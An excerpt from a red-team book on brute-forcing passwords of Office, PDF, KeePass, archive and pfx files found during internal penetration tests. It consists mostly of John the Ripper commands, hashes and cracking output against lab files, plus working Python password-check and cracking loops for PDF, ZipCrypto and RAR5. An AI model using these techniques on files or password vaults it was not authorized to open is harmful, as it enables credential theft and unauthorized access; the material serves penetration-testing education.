
Cracking sensitive files on the corporate intranet: brute-forcing Office, PDF, archive and KeePass passwords in practice


This article is excerpted from the book 内网安全攻防:红队之路 (Intranet Security Attack and Defense: The Red Team Path).


During an internal network penetration test we frequently come across sensitive files that have been password-protected, such as host login records or network topology documents. In that case we can try to brute-force them with common weak passwords and a wordlist tailored to the target organization. How far a wordlist gets us depends mostly on the key-derivation cost of the file format: john prints it as a "Cost ... (iteration count)" line when the hash loads, and the p/s figures in the sessions below range from tens of thousands of candidates per second for legacy zip encryption down to a few hundred per second for Office 2013, 7z and KeePass.
Brute-forcing document files

The common document formats are Office and PDF. Office documents can be cracked with John the Ripper, available from https://www.openwall.com/john/.

First, the document's password-verification data has to be converted into a hash format that john understands. This is done with office2john.py, from https://github.com/openwall/john/blob/bleeding-jumbo/run/office2john.py:

C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>python office2john.py .\ms08067\ms08067.docx > office.txt
C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>python office2john.py .\ms08067\ms08067.xlsx >> office.txt
C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>type office.txt
ms08067.docx:$office$*2013*100000*256*16*5133eac9d7ed599366d5dee5dbc3ccb6*636ec27b7ab6901f64fb745f641b1a5b*5cb5657a8c16cd46b7ee0ce676aff65f02624d15c80d971888f708ab4459fe2b
ms08067.xlsx:$office$*2013*100000*256*16*d27f8878236c5a0002037aad390a9196*24277fea5d8a223a35fc9a596b67b5f6*a8cb1481d36ad38b71dca80aebd829a804b8b2b7651934bf7120e0472b24e9f3

Then run john against the hash file with a wordlist. Both documents are cracked, and the password of each turns out to be ms08067:

C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>john.exe --wordlist=password.lst office.txt
Warning: detected hash type "Office", but the string is also recognized as "office-opencl"
Use the "--format=office-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (Office, 2007/2010/2013 [SHA1 256/256 AVX2 8x / SHA512 256/256 AVX2 4x AES])
Cost 1 (MS Office version) is 2013 for all loaded hashes
Cost 2 (iteration count) is 100000 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ms08067          (ms08067.docx)
ms08067          (ms08067.xlsx)
2g 0:00:00:01 DONE (2021-09-26 22:08) 1.115g/s 142.7p/s 285.5c/s 285.5C/s lacrosse..flipper
Use the "--show" option to display all of the cracked passwords reliably
Session completed

The Cost 2 line explains the modest 142.7 p/s on eight threads: Office 2013 agile encryption runs 100,000 hash iterations per candidate before the verifier can be decrypted and compared, so the quality of the wordlist matters far more than raw cracking speed here.

PDF documents can also be cracked with john. The workflow is the same as for Office: first convert the file's password-verification data into a john hash, here with pdf2john.pl:

C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>perl pdf2john.pl .\ms08067\006.pdf > pdf.txt
C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>type pdf.txt
./ms08067/006.pdf:$pdf$4*4*128*-1028*1*16*1730ea102d5e5f4b9c60982b6629230e*32*0ded63df38b8340ff0bfc12b4807932100000000000000000000000000000000*32*9a670082327ba294b296232851313350661f2892bfb80472e0f9caea1677f6ed

Then crack it with john:

C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>john --wordlist=password.lst pdf.txt
Warning: invalid UTF-8 seen reading pdf.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PDF [MD5 SHA2 RC4/AES 32/64])
Cost 1 (revision) is 4 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ms08067          (./ms08067/006.pdf)
1g 0:00:00:00 DONE (2021-09-26 22:24) 21.27g/s 5446p/s 5446c/s 5446C/s 123456..flipper
Use the "--show --format=PDF" options to display all of the cracked passwords reliably
Session completed
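What john does for each of those 5446 candidates per second is small enough to write out in full. The block below is an added example, not code from the book or from John the Ripper. It parses the $pdf$ line pdf2john.pl produced above (filename prefix dropped, line wraps joined), derives the file key from a candidate password as in Algorithm 2 of the PDF specification (one MD5 over the padded password, /O, /P and the document ID, then 50 further MD5 rounds), recomputes the /U entry (Algorithm 5: RC4 of MD5(padding + ID), then 19 more RC4 passes with the key XORed with the round number) and compares the first 16 bytes (Algorithm 6). Only the Python standard library is used; the four-word wordlist at the bottom is constructed for the demonstration, and revision 5/6 files (SHA-256 based, AES-256) are not handled.

```python
"""Re-implementation of the check behind john's PDF format for the standard
security handler, revisions 2-4 (added example; standard library only)."""
import hashlib
import struct
from typing import Optional

# Fixed 32-byte padding string from the PDF specification (Algorithm 2, step a).
PAD = bytes.fromhex(
    "28BF4E5E4E758A4164004E56FFFA01082E2E00B6D0683E802F0CA9FE6453697A"
)

# The pdf2john.pl line from the page (filename prefix dropped, line wraps joined):
# $pdf$V*R*length*P*encrypt_metadata*id_len*id*u_len*u*o_len*o
PDF_HASH = (
    "$pdf$4*4*128*-1028*1*16*1730ea102d5e5f4b9c60982b6629230e"
    "*32*0ded63df38b8340ff0bfc12b4807932100000000000000000000000000000000"
    "*32*9a670082327ba294b296232851313350661f2892bfb80472e0f9caea1677f6ed"
)


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); symmetric, so it both encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(c ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def parse_pdf_hash(line: str) -> dict:
    """Split a $pdf$ line into the fields the password check needs."""
    f = line[line.index("$pdf$") + 5:].split("*")
    h = {
        "V": int(f[0]), "R": int(f[1]), "length": int(f[2]), "P": int(f[3]),
        "encrypt_metadata": f[4] == "1",
        "id": bytes.fromhex(f[6]), "U": bytes.fromhex(f[8]), "O": bytes.fromhex(f[10]),
    }
    if (len(h["id"]), len(h["U"]), len(h["O"])) != (int(f[5]), int(f[7]), int(f[9])):
        raise ValueError("field length does not match its declared length")
    return h


def compute_key(h: dict, password: bytes) -> bytes:
    """Algorithm 2: derive the RC4/AES file key from the user password."""
    if h["R"] > 4:
        raise ValueError("revision 5/6 use SHA-256; not covered here")
    md = hashlib.md5((password + PAD)[:32])              # a-b: pad/truncate to 32 bytes
    md.update(h["O"])                                    # c: the /O entry
    md.update(struct.pack("<I", h["P"] & 0xFFFFFFFF))    # d: /P as little-endian 32-bit
    md.update(h["id"])                                   # e: first element of /ID
    if h["R"] >= 4 and not h["encrypt_metadata"]:
        md.update(b"\xff\xff\xff\xff")                   # f
    digest = md.digest()
    n = 5 if h["R"] == 2 else h["length"] // 8           # i: key length in bytes
    if h["R"] >= 3:
        for _ in range(50):                              # h: the only "cost" in this KDF
            digest = hashlib.md5(digest[:n]).digest()
    return digest[:n]


def compute_u(h: dict, key: bytes) -> bytes:
    """Algorithm 4 (R=2) / Algorithm 5 (R>=3): the /U value for a given key."""
    if h["R"] == 2:
        return rc4(key, PAD)
    out = rc4(key, hashlib.md5(PAD + h["id"]).digest())
    for i in range(1, 20):                               # 19 more RC4 passes, key XOR i
        out = rc4(bytes(b ^ i for b in key), out)
    return out


def check_user_password(h: dict, password: bytes) -> bool:
    """Algorithm 6: True if `password` opens the document as the user password."""
    u = compute_u(h, compute_key(h, password))
    return u == h["U"] if h["R"] == 2 else u[:16] == h["U"][:16]


def crack(h: dict, wordlist) -> Optional[bytes]:
    """Minimal wordlist loop: the first candidate that passes the check, else None."""
    for word in wordlist:
        if check_user_password(h, word):
            return word
    return None


if __name__ == "__main__":
    words = [b"123456", b"password", b"admin", b"ms08067"]   # constructed mini wordlist
    print(crack(parse_pdf_hash(PDF_HASH), words))
```

There is no real key-derivation cost in this scheme, just 51 MD5 calls and 20 short RC4 runs per candidate, which is why the PDF session above runs nearly 40 times faster than the Office one. The check targets the user (document-open) password.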
Brute-forcing KeePass database files

KeePass is a password manager. If we find KeePass in use on a target host during a penetration test, we can also try to brute-force the master password of its database with John the Ripper and read the credentials stored inside. Note that keepass2john captures only the master password: if the database is additionally protected by a key file, pass it with keepass2john -k <keyfile> when generating the hash, otherwise no password candidate will ever verify.

First, convert the KeePass database's key-verification data into a john hash with keepass2john:

C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>keepass2john.exe .\ms08067\ms08067.kdbx > kdbx.txt
C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>type kdbx.txt
ms08067:$keepass$*2*60000*0*05b9d680013b739917b17bad820193561956d7e98eee40ef1c7c95fd86cf75e1*4b185303cbf67555f3753a855e69f59c0944b4fb95fda5e154491b855d7a0da1*97ef796dcf8e24ed26e35b7c00f29efc*4f9b8cba8f317e8b41bb17ac3372c6fc7287c85914bb9f5a30dc7add8af8407d*ea3f4c70aabff2bb9cfb5125e7b14f779663217a80cb6741909f60a4dbe9ac08

Then run john. The master password is recovered as ms08067:

C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>john --wordlist=password.lst kdbx.txt
Warning: detected hash type "KeePass", but the string is also recognized as "KeePass-opencl"
Use the "--format=KeePass-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 60000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES, 1=TwoFish, 2=ChaCha]) is 0 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ms08067          (ms08067)
1g 0:00:00:01 DONE (2021-09-26 22:27) 0.8210g/s 183.9p/s 183.9c/s 183.9C/s lacrosse..tommy
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Brute-forcing compressed archives

Password-protected archives in the common formats (zip, 7z, rar) can also be cracked with John the Ripper. The procedure is the same every time: convert the archive's password-verification data into a john hash with the matching *2john tool, then run john.exe against it.

Cracking a zip file:

C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>zip2john.exe .\ms08067\ms08067.zip > zip.txt
ver 2.0 ms08067.zip/test.docx PKZIP Encr: cmplen=13349, decmplen=17920, crc=D2B97C0A
C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>type zip.txt
ms08067.zip/test.docx:$pkzip2$1*1*2*0*3425*4600*d2b97c0a*0*27*8*3425*d2b9*b6c0*618ffe9014e5802c4647727d8bf7ad62f41edce21a49cdec39939a98c8f798b133a6dd681175b1d1f...omitted...9f6d5d748fd2b25f9fd3a4f11*$/pkzip2$:test.docx:ms08067.zip::.\ms08067\ms08067.zip
C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>john --wordlist=password.lst zip.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ms08067          (ms08067.zip/test.docx)
1g 0:00:00:00 DONE (2021-09-26 22:29) 20.00g/s 70940p/s 70940c/s 70940C/s 123456..sss
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Cracking a 7z file:

C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>perl 7z2john.pl .\ms08067\ms08067.7z > 7z.txt
C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>type 7z.txt
ms08067.7z:$7z$0$19$0$$8$5936cc98cdd54bdc0000000000000000$2638155691$128$128$3de888a246590da5acf1f052ead3a2a439bc103081e365b5f849aa3ca61316953bfb3313132ff8089393b58ebd35d3be3518712824248d0a56e08077a5d4e23ea64b9479c1387f4a7e4bf2199d407be5d54a76578556a64074b6334217a63de4f51bfb8cc48c3e8c9bafb8a813e68d7473ff3ef42e88762e15001a7f47525f77
C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>john --wordlist=password.lst 7z.txt
Warning: detected hash type "7z", but the string is also recognized as "7z-opencl"
Use the "--format=7z-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (7z, 7-Zip [SHA256 256/256 AVX2 8x AES])
Cost 1 (iteration count) is 524288 for all loaded hashes
Cost 2 (padding size) is 0 for all loaded hashes
Cost 3 (compression type) is 0 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ms08067          (ms08067.7z)
1g 0:00:00:02 DONE (2021-09-26 22:31) 0.4397g/s 112.5p/s 112.5c/s 112.5C/s lacrosse..flipper
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Cracking a rar file:

C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>rar2john.exe .\ms08067\ms08067.rar > rar.txt
C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>type rar.txt
.\ms08067\ms08067.rar:$rar5$16$73402e4e30b84b2a8644e2b12e73fd7d$15$9c4b7cf5791cf67239f2e3b4da53127c$8$616aafce8c4d7743
C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>john --wordlist=password.lst rar.txt
Warning: detected hash type "RAR5", but the string is also recognized as "RAR5-opencl"
Use the "--format=RAR5-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (RAR5 [PBKDF2-SHA256 256/256 AVX2 8x])
Cost 1 (iteration count) is 32768 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ms08067          (.\ms08067\ms08067.rar)
1g 0:00:00:00 DONE (2021-09-26 22:35) 3.891g/s 996.1p/s 996.1c/s 996.1C/s 123456..flipper
Use the "--show" option to display all of the cracked passwords reliably
Session completed
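The zip and rar sessions above differ by a factor of about 70 in throughput (70940 p/s for PKZIP against 996 p/s for RAR5), and the reason is the password check itself. As an added example, not from the book or from John the Ripper, the block below re-implements both checks with only the Python standard library. For legacy ZipCrypto it builds a small constructed encrypted entry (a real archiver draws the first 11 header bytes at random; a fixed sequence is used here) and then tests a candidate the same two-stage way john's PKZIP format does: run the key schedule over the password, decrypt the 12-byte encryption header, compare its last byte with the high byte of the entry's CRC-32 (the crc=D2B97C0A value zip2john printed above is that CRC), and only for the 1-in-256 survivors inflate the data and verify the full CRC. For RAR5 it parses the rar2john line from the page and runs PBKDF2-HMAC-SHA256 for 2^15 + 32 iterations, folding the 32-byte result into the 8-byte password-check value stored in the archive header. The four-word wordlist is constructed for the demonstration.

```python
"""Two archive password checks side by side (added example, standard library only):
legacy ZipCrypto, which has no key-derivation cost at all, and RAR5, which runs
PBKDF2-HMAC-SHA256 for 2^15 + 32 iterations per candidate."""
import hashlib
import zlib
from typing import Optional

# ---- ZipCrypto: traditional PKWARE encryption (APPNOTE section 6.1) ----
_CRC_TABLE = []
for _n in range(256):
    _c = _n
    for _ in range(8):
        _c = (_c >> 1) ^ 0xEDB88320 if _c & 1 else _c >> 1
    _CRC_TABLE.append(_c)


class ZipCrypto:
    """Key schedule plus stream cipher; one object encrypts or decrypts one entry."""

    def __init__(self, password: bytes):
        self.k0, self.k1, self.k2 = 0x12345678, 0x23456789, 0x34567890
        for b in password:            # the whole "KDF": one key update per password byte
            self._update(b)

    def _update(self, b: int) -> None:
        self.k0 = _CRC_TABLE[(self.k0 ^ b) & 0xFF] ^ (self.k0 >> 8)
        self.k1 = ((self.k1 + (self.k0 & 0xFF)) * 134775813 + 1) & 0xFFFFFFFF
        self.k2 = _CRC_TABLE[(self.k2 ^ (self.k1 >> 24)) & 0xFF] ^ (self.k2 >> 8)

    def _keystream_byte(self) -> int:
        t = (self.k2 | 2) & 0xFFFF
        return ((t * (t ^ 1)) >> 8) & 0xFF

    def encrypt(self, plain: bytes) -> bytes:
        out = bytearray()
        for p in plain:
            out.append(p ^ self._keystream_byte())
            self._update(p)           # keys advance on the plaintext byte
        return bytes(out)

    def decrypt(self, cipher: bytes) -> bytes:
        out = bytearray()
        for c in cipher:
            p = c ^ self._keystream_byte()
            self._update(p)
            out.append(p)
        return bytes(out)


def make_zip_entry(password: bytes, plaintext: bytes) -> dict:
    """Constructed test vector: raw-deflate the data, prepend the 12-byte encryption
    header (11 bytes a real archiver draws at random, then the CRC-32 high byte) and
    encrypt it all the way a zip writer does."""
    crc = zlib.crc32(plaintext)
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)   # -15: raw deflate, as stored in zip
    header = bytes(range(11)) + bytes([crc >> 24])   # fixed "random" bytes for the demo
    data = ZipCrypto(password).encrypt(header + comp.compress(plaintext) + comp.flush())
    return {"crc": crc, "data": data}


def check_zipcrypto(password: bytes, entry: dict) -> bool:
    """Stage 1: one-byte header test (1 in 256 wrong passwords survive it).
    Stage 2, survivors only: inflate the data and verify the full CRC-32."""
    zc = ZipCrypto(password)
    if zc.decrypt(entry["data"][:12])[11] != entry["crc"] >> 24:
        return False
    try:
        plain = zlib.decompress(zc.decrypt(entry["data"][12:]), -15)
    except zlib.error:
        return False
    return zlib.crc32(plain) == entry["crc"]


# ---- RAR5: password-check value from the archive encryption header ----
# rar2john line from the page (line wrap joined):
# $rar5$<salt_len>$<salt>$<log2 iterations>$<iv>$<pswcheck_len>$<pswcheck>
RAR5_HASH = ("$rar5$16$73402e4e30b84b2a8644e2b12e73fd7d$15$"
             "9c4b7cf5791cf67239f2e3b4da53127c$8$616aafce8c4d7743")


def check_rar5(password: bytes, line: str) -> bool:
    """RAR5 takes three values from one PBKDF2 run: the file key after 2^n rounds,
    the hash key 16 rounds later and the password-check value 32 rounds later.
    The 32-byte check value is XOR-folded into the 8 bytes stored in the archive."""
    f = line[line.index("$rar5$") + 6:].split("$")
    salt, log2_iters, pswcheck = bytes.fromhex(f[1]), int(f[2]), bytes.fromhex(f[5])
    value = hashlib.pbkdf2_hmac("sha256", password, salt, (1 << log2_iters) + 32, 32)
    folded = bytearray(8)
    for i, b in enumerate(value):
        folded[i % 8] ^= b
    return bytes(folded) == pswcheck


def crack(check, target, wordlist) -> Optional[bytes]:
    # Minimal wordlist loop shared by both formats: first hit or None.
    for word in wordlist:
        if check(word, target):
            return word
    return None


if __name__ == "__main__":
    words = [b"123456", b"password", b"admin", b"ms08067"]   # constructed mini wordlist
    entry = make_zip_entry(b"ms08067", b"host,user,pass\nfs01,admin,Winter2021!\n" * 4)
    print("zip :", crack(check_zipcrypto, entry, words))
    print("rar5:", crack(check_rar5, RAR5_HASH, words))
```

Both checkers use the same hashlib and zlib primitives; the gap between the page's figures comes entirely from the 2^15 + 32 HMAC calls RAR5 demands per candidate, which is also why the 7z session, with Cost 1 at 524288 iterations, is slower still at 112.5 p/s.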
Brute-forcing pfx certificates

John the Ripper can also crack the password protecting a pfx (PKCS#12) certificate file. As before, first convert it into a hash, here with pfx2john.py:

C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>python pfx2john.py .\ms08067\ms08067.pfx > pfx.txt
C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>type pfx.txt
ms08067.pfx:$pfxng$1$20$2048$8$da005f7d3510770c$308209b03082046706092a864886f70d01070...omitted...65f7499b4c0b84182d592f2$0f0a94e6edf446bfdc8266563ba010ebd9b33cc9:::::.\ms08067\ms08067.pfx

Then crack it with john.exe:

C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>john --wordlist=password.lst pfx.txt
Warning: detected hash type "pfx", but the string is also recognized as "pfx-opencl"
Use the "--format=pfx-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (pfx [PKCS12 PBE (.pfx, .p12) (SHA-1 to SHA-512) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password         (ms08067.pfx)
1g 0:00:00:00 DONE (2021-09-26 22:36) 12.34g/s 25283p/s 25283c/s 25283C/s 123456..mylove
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Once cracked, the password can be verified with certutil. With a wrong password certutil fails with ERROR_INVALID_PASSWORD; with the correct one it dumps the certificate details:

C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>certutil -dump .\ms08067\ms08067.pfx
Enter PFX password: (wrong password)
Cannot decode object: The specified network password is not correct. 0x80070056 (WIN32: 86 ERROR_INVALID_PASSWORD)
CertUtil: -dump command FAILED: 0x80070056 (WIN32: 86 ERROR_INVALID_PASSWORD)
CertUtil: The specified network password is not correct.
C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>certutil -dump .\ms08067\ms08067.pfx
Enter PFX password: (correct password)
================ Certificate 0 ================
================ Begin Nesting Level 1 ================
Element 0:
Serial Number: 3285e458285080fbb584ca986fc3000bcf5ff652
Issuer: E=root@ms08067.cn, OU=ms08067, O=ms08067, L=shanghai, S=SH, C=CN
 NotBefore: 2021/8/22 22:27
 NotAfter: 2031/8/20 22:27
Subject: E=root@ms08067.cn, OU=ms08067, O=ms08067, L=shanghai, S=SH, C=CN
Signature matches Public Key
Root Certificate: Subject matches Issuer
Cert Hash(sha1): 7c518c92c2126bec265f7499b4c0b84182d592f2
----------------  End Nesting Level 1  ----------------
  Provider = Microsoft Enhanced Cryptographic Provider v1.0
Encryption test passed
CertUtil: -dump command completed successfully.

About us

Zhenjiang Cizhang Information Technology Co., Ltd. was founded in 2020 and runs the MS08067 Security Lab, a provider of education, training and certification products and services in the network security field. Over the past two years it has trained close to 100,000 people online and produced nearly 6,000 security professionals.
